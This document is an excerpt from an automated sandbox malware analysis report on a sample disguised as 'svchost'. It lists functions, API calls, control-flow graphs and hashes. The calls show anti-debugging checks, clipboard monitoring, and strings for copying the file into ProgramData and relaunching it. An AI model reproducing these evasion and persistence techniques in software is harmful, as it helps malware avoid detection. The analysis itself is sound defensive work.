                                      • Opcode Fuzzy Hash: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction Fuzzy Hash: 69016DB4D40308BBDB10AFA0DC4A7DE7B74AB08706F10C07AA945626D1D6785A84DB5A
                                      Function 0040E210 Relevance: 9.1, APIs: 6, Instructions: 97registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 224 40e210-40e249 225 40e255-40e257 224->225 226 40e24b-40e253 224->226 228 40e32e-40e331 225->228 226->225 227 40e25c-40e260 226->227 229 40e262-40e26a GetModuleHandleW 227->229 230 40e26d-40e293 GetClassInfoA 227->230 229->230 231 40e295-40e299 230->231 232 40e29b-40e2ab RegisterClassA 230->232 233 40e2ae-40e2b4 231->233 232->233 234 40e301-40e305 233->234 235 40e2b6-40e2ba 233->235 238 40e315-40e31b 234->238 239 40e307-40e313 ShowWindow 234->239 236 40e2c4 235->236 237 40e2bc-40e2c2 235->237 240 40e2cb-40e2fe CreateWindowExA 236->240 237->240 241 40e32b 238->241 242 40e31d-40e325 UnregisterClassA 238->242 239->241 240->234 241->228 242->241
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040E264
                                      • GetClassInfoA.USER32(00000000,00000000,?), ref: 0040E28B
                                      • RegisterClassA.USER32(00000000), ref: 0040E29F
                                      • CreateWindowExA.USER32(00000000,00000000,0041CCD4,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0040E2F8
                                      • ShowWindow.USER32(00000000,00000000), ref: 0040E30D
                                      • UnregisterClassA.USER32(00000000,00000000), ref: 0040E325
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Class$Window$CreateHandleInfoModuleRegisterShowUnregister
                                      • String ID:
                                      • API String ID: 801957319-0
                                      • Opcode ID: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction ID: a965deb00f86eced1c550541a2bb8782c69ddf198977c8bb291b1a06dc78ae28
                                      • Opcode Fuzzy Hash: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction Fuzzy Hash: 3B411B74D04209EFDB50CFA9D844BEEBBB5BB48300F14846EE919B7280D7789961CF69
                                      Function 0040F051 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 243 40f051-40f057 244 40efd1-40efd9 243->244 245 40efe8-40efeb call 410b93 244->245 247 40eff0-40eff3 245->247 248 40eff5-40eff6 247->248 249 40efdb-40efe6 call 4110f1 247->249 249->245 252 40eff7-40f008 249->252 253 40f036-40f050 call 40e82e call 411119 252->253 254 40f00a-40f035 call 40e718 call 4110cb 252->254 253->243 254->253
                                      APIs
                                      • _malloc.LIBCMT ref: 0040EFEB
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • std::exception::exception.LIBCMT ref: 0040F020
                                      • std::exception::exception.LIBCMT ref: 0040F03A
                                      • __CxxThrowException@8.LIBCMT ref: 0040F04B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                      • String ID:
                                      • API String ID: 615853336-0
                                      • Opcode ID: fbad043f0e74b480cd2cc0079a4bacdacac9609b018db1ef7578698261e708b7
                                      • Instruction ID: 1e2d0527fb0d68fa3bcd4beffa05bed18b15ee7e689a91fba965b1ab2acf346e
                                      • Opcode Fuzzy Hash: fbad043f0e74b480cd2cc0079a4bacdacac9609b018db1ef7578698261e708b7
                                      • Instruction Fuzzy Hash: 5101473550020A66CB10E757D802AEEBBE99B80358F14007FF400A21D3DB79AA92CA8D
                                      Function 0040DE20 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00401090: GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                        • Part of subcall function 00401090: GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                        • Part of subcall function 00401090: NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                      • _wcsrchr.LIBCMT ref: 0040DE5E
                                      • SetCurrentDirectoryW.KERNELBASE(?), ref: 0040DE7E
                                      • SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Module$AddressCurrentDirectoryErrorFileHandleInformationModeNameProcThread_wcsrchr
                                      • String ID:
                                      • API String ID: 1734398998-0
                                      • Opcode ID: 857e7daad55e3966da8993c541fa6c9fdcddb044e01855e595ba07532dd17d0c
                                      • Instruction ID: d51f74107fde24b1b44d4026587f8350a487b3b151098653a9adb7166d01a02a
                                      • Opcode Fuzzy Hash: 857e7daad55e3966da8993c541fa6c9fdcddb044e01855e595ba07532dd17d0c
                                      • Instruction Fuzzy Hash: FC016770D002089BE750DFB1DD06BED7774AF08705F00407DA745B61D1EE759A55CB69
                                      Function 0040E4B0 Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 275 40e4b0-40e4c7 276 40e4c9-40e4d1 275->276 277 40e4df-40e4e1 275->277 276->277 278 40e4d3-40e4d7 276->278 279 40e53e-40e541 277->279 278->277 280 40e4d9-40e4dd 278->280 280->277 281 40e4e3-40e503 CreateFileW 280->281 282 40e505-40e507 281->282 283 40e509-40e53b ReadFile CloseHandle 281->283 282->279 283->279
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040E4F6
                                      • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E51B
                                      • CloseHandle.KERNEL32(000000FF), ref: 0040E52D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleRead
                                      • String ID:
                                      • API String ID: 1035965006-0
                                      • Opcode ID: 25b86b350a1d5725d5ef31d7189108e058dca359b1a55ff52c9e9582d333e8df
                                      • Instruction ID: 08e041bf8671aa807d449c44a376e0531f72ea10ffa7659b1e9f716e124a0f61
                                      • Opcode Fuzzy Hash: 25b86b350a1d5725d5ef31d7189108e058dca359b1a55ff52c9e9582d333e8df
                                      • Instruction Fuzzy Hash: 9C116D34A04208FBDF20CFA5D845BEA77B9AF49304F1085A9F915672C0D7799A24CB65
                                      Function 0040DF97 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 284 40df97-40dfb0 call 40de20 287 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 284->287 288 40dfe2 287->288 289 40dfdc-40dfe0 287->289 290 40dfe2 call 40d7f0 288->290 289->288 291 40dfec-40dff0 289->291 292 40dfe7 290->292 293 40dff6-40e00c call 40f476 291->293 294 40e0ab-40e0af 291->294 292->294 300 40e04e-40e064 call 40f476 293->300 301 40e00e-40e019 293->301 296 40e0b1-40e0b5 LocalFree 294->296 297 40e0bb-40e119 294->297 296->297 308 40e0a6 300->308 309 40e066-40e071 300->309 302 40e01b-40e031 call 40f476 301->302 303 40e03c-40e044 call 405b10 301->303 302->303 315 40e033-40e039 302->315 311 40e049-40e04c 303->311 314 40e0a6 call 40d7f0 308->314 312 40e073-40e089 call 40f476 309->312 313 40e094-40e0a4 call 405e10 309->313 311->294 312->313 320 40e08b-40e091 312->320 313->294 314->294 315->303 320->313
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNELBASE(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction ID: 8b7a6b8f356ce4702e62b5b31cb6d48a6c6ddf238daab223e574e510f6bfc381
                                      • Opcode Fuzzy Hash: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction Fuzzy Hash: 52010471D04219CBDB24DFE5D9087EEBBB4FB08315F20862AD402B22D0C77D591ADB6A
                                      Function 0040DFA6 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 321 40dfa6-40dfb0 call 40de20 324 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 321->324 325 40dfe2 324->325 326 40dfdc-40dfe0 324->326 327 40dfe2 call 40d7f0 325->327 326->325 328 40dfec-40dff0 326->328 329 40dfe7 327->329 330 40dff6-40e00c call 40f476 328->330 331 40e0ab-40e0af 328->331 329->331 337 40e04e-40e064 call 40f476 330->337 338 40e00e-40e019 330->338 333 40e0b1-40e0b5 LocalFree 331->333 334 40e0bb-40e119 331->334 333->334 345 40e0a6 337->345 346 40e066-40e071 337->346 339 40e01b-40e031 call 40f476 338->339 340 40e03c-40e044 call 405b10 338->340 339->340 352 40e033-40e039 339->352 348 40e049-40e04c 340->348 351 40e0a6 call 40d7f0 345->351 349 40e073-40e089 call 40f476 346->349 350 40e094-40e0a4 call 405e10 346->350 348->331 349->350 357 40e08b-40e091 349->357 350->331 351->331 352->340 357->350
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNELBASE(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction ID: ae0a6c04ace250e6ec1f5edccdaa0bc9745cba344c46f71d870c8753c6498d62
                                      • Opcode Fuzzy Hash: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction Fuzzy Hash: 2E014471C04218CBDB24DFE5D8087EEBBB4FB08315F10422AD802B3280C77D5919CBAA
                                      Function 004014A0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 358 4014a0-4014b7 GetCurrentProcess CheckRemoteDebuggerPresent 359 4014c2 358->359 360 4014b9-4014c0 358->360 361 4014c4-4014c7 359->361 360->361
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?), ref: 004014A8
                                      • CheckRemoteDebuggerPresent.KERNELBASE(00000000), ref: 004014AF
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CheckCurrentDebuggerPresentProcessRemote
                                      • String ID:
                                      • API String ID: 3244773808-0
                                      • Opcode ID: 2a967ada78a2ab3b4a1292265fbf65d9d587c0a9198b8703d3f526cd3a6db7a4
                                      • Instruction ID: 65bc4ce697b09d766b27661658b024bedcce05a3cc3625d10305c865c1bed5cd
                                      • Opcode Fuzzy Hash: 2a967ada78a2ab3b4a1292265fbf65d9d587c0a9198b8703d3f526cd3a6db7a4
                                      • Instruction Fuzzy Hash: 6BD0A732505208FBCF10DFF19C0DAEE77ECEB05301F0441B6A805921A0D678CB14E676
                                      Function 004014D0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401180: GetModuleHandleA.KERNEL32(00000000), ref: 0040119B
                                        • Part of subcall function 00401180: GetProcAddress.KERNEL32(00000000,00000000), ref: 004011BC
                                        • Part of subcall function 00401180: GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 004011D5
                                        • Part of subcall function 00401180: NtQueryInformationProcess.NTDLL(00000000), ref: 004011DC
                                      • ExitProcess.KERNEL32 ref: 00401511
                                        • Part of subcall function 00401200: GetModuleHandleA.KERNEL32(00000000), ref: 0040121B
                                        • Part of subcall function 00401200: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040123C
                                        • Part of subcall function 00401200: GetCurrentProcess.KERNEL32(0000001F,00000000,00000004,00000000), ref: 00401255
                                        • Part of subcall function 00401200: NtQueryInformationProcess.NTDLL(00000000), ref: 0040125C
                                        • Part of subcall function 004014A0: GetCurrentProcess.KERNEL32(?), ref: 004014A8
                                        • Part of subcall function 004014A0: CheckRemoteDebuggerPresent.KERNELBASE(00000000), ref: 004014AF
                                        • Part of subcall function 004013F0: _memset.LIBCMT ref: 0040141B
                                        • Part of subcall function 004013F0: GetCurrentThread.KERNEL32 ref: 00401434
                                        • Part of subcall function 004013F0: GetThreadContext.KERNEL32(00000000), ref: 0040143B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$Current$AddressHandleInformationModuleProcQueryThread$CheckContextDebuggerExitPresentRemote_memset
                                      • String ID:
                                      • API String ID: 4175358967-0
                                      • Opcode ID: 3c0c4aa8033a52a8745ea1f515c5c70d635903a19c692f71d8548e65835fc8ba
                                      • Instruction ID: d4825ca4a1344b9428fc6eb4c4397339609c168b71d01e32b5fecf6a8fec44f5
                                      • Opcode Fuzzy Hash: 3c0c4aa8033a52a8745ea1f515c5c70d635903a19c692f71d8548e65835fc8ba
                                      • Instruction Fuzzy Hash: D9F0549450527731EA5E36A7181223F20851DD578E784407FB887BC5F7EE7CC40910BD

                                      Non-executed Functions

                                      Function 0040D7F0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 394COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset$FileModuleName_wcsrchr
                                      • String ID: " --run$.exe$C:\ProgramData$D
                                      • API String ID: 4110263760-856358560
                                      • Opcode ID: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction ID: 5e5d0b140630b177179d526cbad5a59638b82476de5506c4c87b912bd79cfa18
                                      • Opcode Fuzzy Hash: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction Fuzzy Hash: 80F15271E443189BDB20DF60CC45BEAB774AF49704F0081E9E20DB6681EBB55AD8CF5A
                                      Function 00405390 Relevance: 25.7, APIs: 17, Instructions: 207clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004053DB
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0040540A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AvailableClipboardCountFormatTick
                                      • String ID:
                                      • API String ID: 2629628197-0
                                      • Opcode ID: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction ID: e3f2d7c064d7d99d206c5680652346840c7ffd9ef1d315a872dd3332421114f8
                                      • Opcode Fuzzy Hash: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction Fuzzy Hash: 84914A71D00218DFCB14DFAAD848AEFBBB5FF48305F10856AE51AA7290D7389945CF29
                                      Function 0040E542 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0040F928
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F93D
                                      • UnhandledExceptionFilter.KERNEL32(0041A294), ref: 0040F948
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040F964
                                      • TerminateProcess.KERNEL32(00000000), ref: 0040F96B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction ID: 88087e6288b79e792aea48af548dc1751c073badf06254871cafe7bc60af0824
                                      • Opcode Fuzzy Hash: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction Fuzzy Hash: C221D6B4A02308DFD720EF65F8496957BE0FB48304F90903AE50993663D7B45596CF9D
                                      Function 00410689 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0040F780), ref: 00410691
                                      • __mtterm.LIBCMT ref: 0041069D
                                        • Part of subcall function 004103D6: DecodePointer.KERNEL32(00000005,004107FF,?,0040F780), ref: 004103E7
                                        • Part of subcall function 004103D6: TlsFree.KERNEL32(0000000C,004107FF,?,0040F780), ref: 00410401
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,004107FF,?,0040F780), ref: 004125E8
                                        • Part of subcall function 004103D6: _free.LIBCMT ref: 004125EB
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(0000000C,76EF5810,?,004107FF,?,0040F780), ref: 00412612
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004106B3
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004106C0
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004106CD
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004106DA
                                      • TlsAlloc.KERNEL32(?,0040F780), ref: 0041072A
                                      • TlsSetValue.KERNEL32(00000000,?,0040F780), ref: 00410745
                                      • __init_pointers.LIBCMT ref: 0041074F
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410760
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041076D
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041077A
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410787
                                      • DecodePointer.KERNEL32(0041055A,?,0040F780), ref: 004107A8
                                      • __calloc_crt.LIBCMT ref: 004107BD
                                      • DecodePointer.KERNEL32(00000000,?,0040F780), ref: 004107D7
                                      • GetCurrentThreadId.KERNEL32 ref: 004107E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 3698121176-3819984048
